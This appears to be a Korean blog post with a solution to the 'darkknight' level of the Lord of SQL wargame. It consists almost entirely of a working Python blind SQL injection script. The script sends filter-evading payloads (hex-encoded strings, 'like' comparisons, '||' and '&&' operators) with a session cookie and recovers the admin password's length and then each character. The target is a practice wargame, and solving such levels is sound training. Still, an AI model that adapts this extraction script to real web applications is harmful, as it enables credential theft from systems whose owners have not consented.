import urllib2
def request(data):
url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?no="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
response = urllib2.urlopen(req).read()
if "Hello admin" in str(response):
return True
else:
return False
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"
for i in range(0,50):
payload = "1 || 1 like 1 && id like 0x61646d696e && length(pw) like "+str(i)+"#"
if request(payload)==True:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(0,len(strings)):
payload = "1 || 1 like 1 && id like 0x61646d696e && right(left(pw,"+str(j)+"),1) like 0x"+strings[i].encode('hex')+"#"
if request(payload)==True:
admin_pw += strings[i]
print "[-]Admin Password = " + admin_pw
break
print "[*]Admin Password = " + admin_pw
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS giant (0) | 2018.02.08 |
|---|---|
| LOS bugbear (0) | 2018.02.08 |
| LOS golem (0) | 2018.02.08 |
| LOS skeleton (0) | 2018.02.08 |
| LOS vampire (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간